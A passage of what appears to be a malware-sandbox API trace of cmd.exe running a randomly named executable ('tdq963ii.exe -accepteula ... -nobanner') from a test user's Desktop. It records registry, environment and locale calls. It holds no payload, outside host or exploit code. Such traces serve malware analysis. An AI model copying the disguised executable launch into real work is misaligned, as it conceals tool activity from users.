lpPerformanceCount=0x28fb2c | out: lpPerformanceCount=0x28fb2c*=28853870836) returned 1 [0168.202] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0168.202] __set_app_type (_Type=0x1) [0168.202] __p__fmode () returned 0x770331f4 [0168.203] __p__commode () returned 0x770331fc [0168.203] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0168.203] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0168.203] GetCurrentThreadId () returned 0xb04 [0168.203] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb04) returned 0x60 [0168.204] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0168.204] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0168.204] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.056] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0169.056] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fac4 | out: phkResult=0x28fac4*=0x0) returned 0x2 [0169.056] VirtualQuery (in: lpAddress=0x28fafb, lpBuffer=0x28fa94, dwLength=0x1c | out: lpBuffer=0x28fa94*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.056] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fa94, dwLength=0x1c | out: lpBuffer=0x28fa94*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0169.056] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fa94, dwLength=0x1c | out: lpBuffer=0x28fa94*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0169.056] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fa94, dwLength=0x1c | out: lpBuffer=0x28fa94*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.056] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fa94, dwLength=0x1c | out: lpBuffer=0x28fa94*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0169.056] GetConsoleOutputCP () returned 0x1b5 [0169.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0169.057] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0169.057] _get_osfhandle (_FileHandle=1) returned 0x80 [0169.057] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0169.058] _get_osfhandle (_FileHandle=1) returned 0x80 [0169.058] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0169.058] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.058] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0169.059] GetEnvironmentStringsW () returned 0x6a21c8* [0169.059] GetProcessHeap () returned 0x690000 [0169.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb7a) returned 0x6a2d50 [0169.060] FreeEnvironmentStringsW (penv=0x6a21c8) returned 1 [0169.060] GetProcessHeap () returned 0x690000 [0169.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x6a18a8 [0169.060] GetEnvironmentStringsW () returned 0x6a21c8* [0169.060] GetProcessHeap () returned 0x690000 [0169.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb7a) returned 0x6a38d8 [0169.061] FreeEnvironmentStringsW (penv=0x6a21c8) returned 1 [0169.061] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ea34 | out: phkResult=0x28ea34*=0x68) returned 0x0 [0169.061] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x0, lpData=0x28ea40*=0x0, lpcbData=0x28ea38*=0x1000) returned 0x2 [0169.061] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x1, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.062] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x0, lpData=0x28ea40*=0x1, lpcbData=0x28ea38*=0x1000) returned 0x2 [0169.062] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x0, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.062] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x40, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.062] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x40, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.062] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x0, lpData=0x28ea40*=0x40, lpcbData=0x28ea38*=0x1000) returned 0x2 [0169.062] RegCloseKey (hKey=0x68) returned 0x0 [0169.062] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ea34 | out: phkResult=0x28ea34*=0x68) returned 0x0 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x0, lpData=0x28ea40*=0x40, lpcbData=0x28ea38*=0x1000) returned 0x2 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x1, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x0, lpData=0x28ea40*=0x1, lpcbData=0x28ea38*=0x1000) returned 0x2 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x0, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x9, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x4, lpData=0x28ea40*=0x9, lpcbData=0x28ea38*=0x4) returned 0x0 [0169.063] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ea3c, lpData=0x28ea40, lpcbData=0x28ea38*=0x1000 | out: lpType=0x28ea3c*=0x0, lpData=0x28ea40*=0x9, lpcbData=0x28ea38*=0x1000) returned 0x2 [0169.063] RegCloseKey (hKey=0x68) returned 0x0 [0169.064] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2c6 [0169.064] srand (_Seed=0x5f51e2c6) [0169.064] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"blank.jtp\" -nobanner" [0169.064] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"blank.jtp\" -nobanner" [0169.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0169.065] GetProcessHeap () returned 0x690000 [0169.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a21c8 [0169.066] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a21d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0169.066] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0169.066] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0169.066] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0169.066] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.066] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0169.067] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0169.067] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0169.067] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0169.067] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0169.067] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0169.067] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0169.067] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0169.067] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0169.067] GetProcessHeap () returned 0x690000 [0169.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a23e0 [0169.067] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f800 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0169.068] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f800, lpFilePart=0x28f7fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f7fc*="Desktop") returned 0x25 [0169.068] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0169.068] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f57c | out: lpFindFileData=0x28f57c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a2048 [0169.068] FindClose (in: hFindFile=0x6a2048 | out: hFindFile=0x6a2048) returned 1 [0169.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f57c | out: lpFindFileData=0x28f57c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6a2048 [0169.069] FindClose (in: hFindFile=0x6a2048 | out: hFindFile=0x6a2048) returned 1 [0169.069] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0169.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f57c | out: lpFindFileData=0x28f57c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a2048 [0169.070] FindClose (in: hFindFile=0x6a2048 | out: hFindFile=0x6a2048) returned 1 [0169.070] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0169.070] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0169.070] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0169.070] GetProcessHeap () returned 0x690000 [0169.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2d50 | out: hHeap=0x690000) returned 1 [0169.071] GetEnvironmentStringsW () returned 0x6a4460* [0169.071] GetProcessHeap () returned 0x690000 [0169.071] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb7a) returned 0x6a2c40 [0169.071] FreeEnvironmentStringsW (penv=0x6a4460) returned 1 [0169.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0169.071] GetProcessHeap () returned 0x690000 [0169.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a23e0 | out: hHeap=0x690000) returned 1 [0169.072] GetProcessHeap () returned 0x690000 [0169.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x6a4460 [0169.072] GetProcessHeap () returned 0x690000 [0169.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x6a) returned 0x6a37c8 [0169.073] GetProcessHeap () returned 0x690000 [0169.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0169.073] GetConsoleOutputCP () returned 0x1b5 [0169.073] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0169.073] GetUserDefaultLCID () returned 0x409 [0169.074] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0169.074] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f940, cchData=128 | out: lpLCData="0") returned 2 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f940, cchData=128 | out: lpLCData="0") returned 2 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f940, cchData=128 | out: lpLCData="1") returned 2 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0169.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0169.076] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0169.076] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0169.076] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0169.076] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0169.076] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0169.078] GetProcessHeap () returned 0x690000 [0169.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x6a4460 [0169.078] GetConsoleTitleW (in: lpConsoleTitle=0x6a4460, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.079] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0169.079] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0169.079] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0169.080] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0169.081] GetProcessHeap () returned 0x690000 [0169.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x6a4678 [0169.081] GetProcessHeap () returned 0x690000 [0169.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4678 | out: hHeap=0x690000) returned 1 [0169.085] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0169.085] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0169.085] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0169.085] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0169.085] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0169.085] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0169.085] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0169.086] GetProcessHeap () returned 0x690000 [0169.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a23e0 [0169.086] GetProcessHeap () returned 0x690000 [0169.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x22) returned 0x6a3840 [0169.095] GetProcessHeap () returned 0x690000 [0169.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4e) returned 0x6a3870 [0169.098] GetConsoleTitleW (in: lpConsoleTitle=0x28f638, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0170.339] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0170.339] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0170.340] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0170.341] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0170.342] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0170.343] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0170.344] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0170.345] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0170.346] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0170.348] GetProcessHeap () returned 0x690000 [0170.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a4678 [0170.348] GetProcessHeap () returned 0x690000 [0170.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x68) returned 0x6a4890 [0170.349] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0170.350] GetProcessHeap () returned 0x690000 [0170.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6a4900 [0170.351] SetErrorMode (uMode=0x0) returned 0x0 [0170.351] SetErrorMode (uMode=0x1) returned 0x0 [0170.351] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6a4908, lpFilePart=0x28f158 